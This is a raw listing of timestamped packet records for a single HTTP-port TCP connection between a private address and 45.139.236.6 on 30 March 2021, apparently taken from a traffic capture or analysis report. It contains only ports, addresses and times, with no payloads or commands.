Mar 30, 2021 14:22:48.936423063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936433077 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936463118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936496973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936517000 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936522961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936527014 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936547995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936558962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936578035 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936590910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936605930 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936620951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936628103 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936652899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936676979 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936683893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936721087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936723948 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936745882 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936755896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936768055 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936786890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936801910 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936817884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936829090 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936847925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936860085 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936878920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936907053 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936911106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936944008 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936995983 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:49.021507025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.021681070 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:49.023988962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024019003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024048090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024075031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024101019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024135113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024164915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024190903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024202108 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:49.024219036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024250031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024275064 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:49.024276018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024305105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024317026 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:49.024339914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024363995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:49.024374008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024405003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:49.024430037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:49.024482965 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:51.396064043 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:51.482630968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930301905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930361986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930402040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930438995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930475950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930514097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930517912 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:51.930562973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930605888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930644035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930653095 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:51.930685997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:51.930722952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:51.930784941 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.017873049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.017911911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.017930984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.017949104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018090963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.018199921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.018218994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018238068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018256903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018275976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018291950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018309116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018318892 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.018326044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018346071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018362999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018378973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018399000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018402100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.018418074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018436909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018455029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018459082 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.018471956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018486977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.018527031 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.018579006 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108012915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108088970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108129025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108166933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108203888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108242989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108262062 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108283043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108333111 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108339071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108376980 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108416080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108431101 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108454943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108493090 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108494043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108531952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108561039 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108571053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108608961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108629942 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108658075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108700037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108726978 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108738899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108778954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108800888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108818054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108855963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108879089 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108895063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108933926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.108953953 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.108983040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109031916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109050035 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109074116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109114885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109136105 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109154940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109193087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109210014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109231949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109271049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109291077 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109318972 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109363079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109376907 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109438896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109477997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109508991 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109515905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109555960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109584093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109594107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109633923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109658003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.109672070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.109736919 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.199896097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.199935913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.199953079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.199975014 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.199995995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200018883 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200041056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200062990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200084925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200109959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200131893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200153112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200169086 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200176001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200200081 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200221062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200242996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200265884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200290918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200295925 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200314045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200335026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200355053 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200356007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200380087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200401068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200408936 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200424910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200447083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200473070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200476885 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200496912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200517893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200531006 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200540066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200561047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200582027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200603008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200603008 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200624943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200650930 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200663090 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200678110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200699091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200721025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200723886 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200742960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200762987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200783014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200783968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200805902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200829983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200845957 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200855017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200877905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200897932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200901985 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.200920105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200942039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200962067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.200980902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201005936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201019049 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201030016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201051950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201072931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201092958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201112986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201131105 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201137066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201159000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201184034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201206923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201215982 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201230049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201251984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201276064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201287031 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201298952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201323032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201348066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201353073 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201375008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201421022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201432943 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201447010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201468945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201479912 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201494932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201519012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201535940 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201544046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201569080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201595068 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201596022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201618910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201641083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201643944 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201664925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201689959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201713085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201734066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.201760054 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.201807976 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.204217911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.289865017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.289908886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.289937019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.289963961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.289990902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290019989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290047884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290081978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290112019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290127993 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290143013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290173054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290199995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290225983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290232897 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290254116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290281057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290303946 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290313959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290347099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290359020 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290374041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290400982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290419102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290430069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290457964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290477037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290486097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290513992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290545940 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290545940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290577888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290604115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290604115 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290632010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290658951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290668011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290688992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290710926 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290719986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290747881 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290777922 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290781975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290812969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290836096 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290842056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290870905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290890932 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290899992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290929079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290956020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.290958881 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.290982008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291016102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291017056 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291048050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291071892 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291074038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291102886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291130066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291131973 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291156054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291182995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291188002 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291212082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291245937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291259050 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291277885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291306019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291321993 CEST	49744	80	192.168.2.4	45.139.236.6
